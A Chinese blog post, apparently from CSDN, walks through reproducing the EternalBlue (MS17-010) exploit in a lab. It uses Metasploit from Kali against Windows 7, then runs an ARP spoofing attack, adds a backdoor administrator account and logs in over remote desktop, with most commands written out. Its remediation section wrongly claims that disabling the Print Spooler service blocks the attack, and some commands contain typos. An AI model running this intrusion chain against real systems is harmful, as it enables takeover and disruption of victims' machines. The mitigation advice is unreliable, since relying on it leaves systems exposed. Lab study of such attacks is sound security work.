【永恒之蓝】全网最全的永恒之蓝

最新推荐文章于 2024-08-11 20:49:03 发布
最新推荐文章于 2024-08-11 20:49:03 发布
阅读量2.3k 收藏 45
点赞数 27
文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56254398/article/details/136590349
版权

永恒之蓝

【实验原理】

   “永恒之蓝”漏洞工具利用了windows7中c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度,导致复制数据时出现内存溢出。

溢出的数据覆盖了用于接收数据的内存区域指针,把合法地址修改成了系统保留区域(KI_USER_SHARED_DATA0xf fdf0000)的地址,导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回(SystemCallReturn)地址,从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中,使攻击者成功执行shellcode获得超级用户权限。

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币。

【实验步骤】

 一、配置靶场环境

1)确保在windows7关闭防火墙和自动更新。

2)确保靶机(Windows系统)已开启,并连接到与Kali系统相同的网络。

二、永恒之蓝攻击准备

1)在攻击通过msfconsole命令打开msf功能

2)搜索ms17-010脚本使用ms17-010辅助功能,对靶机进行扫描,信息收集,配置靶机ip

3)检测到可能存在永恒之蓝漏洞ms17-010

三、建立TCP连接并攻击

(1)切换到攻击模块,并查看配置项,配置靶机ip

(2)攻击靶机

四、登录到靶机的shell界面

五、利用这个漏洞进行操作

   (1)上传文件(使用照片代替bug程序)

   (2)进行ARP断网攻击

六、提权与远程桌面设置

    (1)查看远程端口是否开启,如果没有开启就开启该端口

    (2)创建新用户,并将其添加进管理员组

七、远程桌面登录与后渗透攻击

(1)使用Kali自带的远程连接工具进行连接xfreerdp

八、漏洞修复与验证

(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击

(2)重新开启Print Spooler服务,再进行攻击

【实验流程图】

【实验结果】

一、 配置靶场环境

(1)将kali和windows7的网络配置,都配置成桥接模式,为了后面使他们在同一网段

(2)将windows7中进行设置,将系统自动更新和系统防火墙关闭,不关防火墙会出现,kali的IP地址ping不到windows7的IP地址

(3)查看windows7和kali的IP地址,查询靶机ip192.168.126.129,和攻击机ip192.168.126.130,并测试互连

ipconfig

Ping 192.168.126.129

二、永恒之蓝攻击准备

(1)在攻击通过msfconsole令打开msf功能,

msfconsole

(2)搜索ms17-010脚本,使用ms17-010辅助功能

Search ms17-010

3)对靶机进行扫描,信息收集,配置靶机IP,运行

Use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.126.129

run

三、建立TCP连接并攻击

  1. 切换到攻击模块,并查看配置项,配置靶机ip

Use exploit/windows/smb/ms17_010_eternalblue

进行攻击

Set rhosts 192.168.126.129

run

四、登录到靶机的shell界面

shell

五、利用这个漏洞进行操作

   (1)事先在kali准备图片,可直接上传至windows中(这里用图片代替漏洞程序或bug文件)

Upload /home/kali/Desktop/1.jpg c:\\

可以看到已经上传过去了

(2)进行ARP断网攻击,查看网关,这里win7的网关是192.168.126.2

Arpspoof -I eht0 -t 192.168.126.129 192.168.126.2

这里看到win7中,已经断网了

六、提权与远程桌面设置

  1. 查看远程端口是否开启,如果没有开启就开启该端口

netstat -an

  1. 开启3389端口,并再次查看,看到已经开启

Netstat -an|find *3389*

  1. 创建新用户,并将其添加进管理员组

 net user hack 123123 /add

net localgroup administrators hack /add

七、远程桌面登录与后渗透攻击

(1)使用Kali自带的远程连接工具进行连接xfreerdp

xfreerdp/u:hack/p:123123/v:192.168.126.129/size:80%

在这里还能看到之前上传的图片

八、漏洞修复与验证

(1)找到windows7的Print Spooler服务,并禁用后,再进行攻击

Services.msc

(2)将Print Spooler服务关闭,重新攻击,可以看出禁用之后就攻击不进去了FAIL,说明Windows 7禁用Print Spooler服务后,对于永恒之蓝漏洞的攻击确实能提供一定的防御效果。

(3)重新开启Print Spooler服务,再进行攻击(重新启用服务后,一定得重启windows7,不然还是攻击不进去,注意!!!)

重新攻击,看到又攻击进去了。

喜欢听花海
关注
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 3420
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之蓝检查工具
10-26
永恒之蓝检查工具
永恒之蓝利用流程及meterpreter的命令使用
最新发布
L35052634的博客
08-11 485
(编号0,exploit/windows/smb/ms17_010_eternalblue,为攻击模块,等下我们会使用这个模块进行攻击,编号3,auxiliary/scanner/smb/smb_ms17_010,为扫描模块,探测靶机是否存在该漏洞)第一步:切换为攻击模块(exploit/windows/smb/ms17_010_eternalblue),对其利用“永恒之蓝”的漏洞,先使用。实验准备:攻击机IP:192.168.1.17,靶机IP:192.168.1.9。
永恒之蓝
weixin_46809039的博客
10-25 345
永恒之蓝(ms17-010) ms17-010,2017年最火的漏洞,没有之一。今天重温一下。 渗透准备 win7+kali 并且确保两台主机在同一个网段。可以相互ping通。 可以互相ping通 进入msf 使用search 命令进行查找 然后使用show options查看和配置。 配置win7的 ip set rhosts /set rport set payload等内容。 然后开炮就可以了。 输入shell命令以后,自己就可以继续扩大渗透成果了。 ...
永恒之蓝(EternalBlue)
yy1024iy的博客
05-30 1339
本文介绍了永恒之蓝的基本概念和攻击方法,以及建议用户采取什么措施来防止自己受到攻击。永恒之蓝是一种利用微软Windows系统漏洞的攻击工具,被黑客广泛使用。文章描述了永恒之蓝的操作过程,并提醒读者应该定期更新操作系统和安全软件,严格保护密码等敏感信息,以避免受到网络攻击的威胁。
永恒之蓝检测工具
09-06
简单易用,小巧无毒,可以对大段IP进行扫描,也可以指定IP
永恒之蓝(MS17-010)
小白一枚多多关注的博客
11-12 4968
永痕之蓝,微软漏洞编号:MS17-010,该漏洞是由黑客组织Shadow Brokers公布出来的,据江湖传言,该漏洞是美军网络安全部门研制出来的。 该漏洞利用的是windows的smb服务,该漏洞可以直接通过smb服务来获取受害机的最高权限
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
2024年[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1),2024年最新网络安全中高级面试必知必会
m0_60691292的博客
05-05 661
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。
〖EXP〗NSA MS17010永恒之蓝漏洞一键工具
K8哥哥
07-15 1917
漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞检测 无损检测,不会对目标造成任何危害,大家无需担心 Ladon 192.168.1.8 MS1701
〖EXP〗NSA MS17010永恒之蓝一键工具
K8哥哥
01-05 7731
漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞检测 无损检测,不会对目标造成任何危害,大家无需担心 Ladon 192.168.1.8 MS1701
永恒之蓝样本.rar
10-10
永恒之蓝样本---感兴趣可以测试
永恒之蓝检测工具.rar
10-16
永恒之蓝检测工具.rar
永恒之蓝检测.zip
10-20
永恒之蓝检测.zip分享给大家,请有需要的人学习下载,后续会更新各种网络安全工具,请关注后续
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
热门推荐
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
永恒之蓝简介
Jackson_LCY的博客
05-15 999
永恒之蓝简介
永恒之蓝 MS17-010
weixin_43726831的博客
11-19 824
WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国...
渗透测试基础与永恒之蓝复现
同时,特别提到了永恒之蓝漏洞的复现,该漏洞主要影响Windows 7系统,并与ms17-010补丁相关。文档内容还涵盖了情报搜集、威胁建模和漏洞分析等关键步骤。" 渗透测试是网络安全领域中至关重要的一环,它通过模拟黑客...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值